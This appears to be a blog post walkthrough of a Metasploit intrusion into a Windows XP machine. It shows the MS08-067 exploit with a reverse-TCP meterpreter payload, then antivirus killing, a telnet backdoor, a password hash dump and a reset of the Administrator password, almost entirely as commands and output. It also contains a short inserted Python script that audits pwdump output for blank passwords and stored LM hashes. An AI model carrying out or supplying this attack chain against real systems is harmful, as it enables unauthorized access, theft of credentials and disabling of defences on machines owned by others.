metasploit meterpreter quiet, telnet

Below: the exploit, the backdoor, and telnet.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.45
LHOST => 192.168.1.45
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.200
RHOST => 192.168.1.200

exploit

msf exploit(ms08_067_netapi) > exploit -f

[*] Started reverse handler on 192.168.1.45:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.200:1913)

kill av, get telnet

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*]     The Telnet Server Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary

In case there are accounts other than Administrator,

meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Ray16:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7d006c3deefcb55524e896ae900db85e:3c877a4ddf86e32f4c1e5b36217db268:::
SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:77d358f2c00b3af0f58f110c778d7f05:::
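
The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::). As an added example that is not part of the original post, this Python audit reads such lines and flags accounts whose NT field is the well-known empty-password value or that still store an LM hash. The function names and the sample accounts are constructed for illustration.

```python
import string

# Well-known constants: the values Windows produces for an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # also shown when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample input; the non-empty hash values are placeholders, not real hashes.
SAMPLE = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
this line is not a pwdump record
"""


def is_hex32(value):
    """True if value looks like a 128-bit hash written as 32 hex characters."""
    return len(value) == 32 and all(c in string.hexdigits for c in value)


def audit_pwdump(text):
    """Return {account: [findings]} for each well-formed record that has a finding."""
    report = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        # Expected layout: user, RID, LM hash, NT hash, then three empty fields.
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip prompts, banners and malformed lines
        user, lm, nt = parts[0], parts[2].lower(), parts[3].lower()
        if not (is_hex32(lm) and is_hex32(nt)):
            continue
        findings = []
        if nt == EMPTY_NT:
            # Remediation: set a password or disable the account.
            findings.append("blank password")
        if lm != EMPTY_LM:
            # Remediation: enable the NoLMHash policy, then change the password.
            findings.append("LM hash stored")
        if findings:
            report[user] = findings
    return report


if __name__ == "__main__":
    for account, findings in audit_pwdump(SAMPLE).items():
        print(f"{account}: {', '.join(findings)}")
```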

execute, interact

meterpreter > execute -f cmd.exe -c
Process 6220 created.
Channel 8 created.
meterpreter > interact 8
Interacting with channel 8...

Set the Administrator password to “password”

C:\WINDOWS>net user Administrator password
net user Administrator password
The command completed successfully.

Port 23, telnet is active

root@bt:~# nmap -p 23 192.168.1.200

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-06 07:37 UTC
Interesting ports on 192.168.1.200:
PORT   STATE SERVICE
23/tcp open telnet
MAC Address: 00:1F:C6:0B:1A:A1 (Asustek Computer)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

go telnet

root@bt:~# telnet 192.168.1.200
Trying 192.168.1.200...
Connected to 192.168.1.200.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: Administrator
password:

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>

Metasploit is a powerful tool; the rest is just a matter of creativity.
http://ray16.info/~me/?p=589
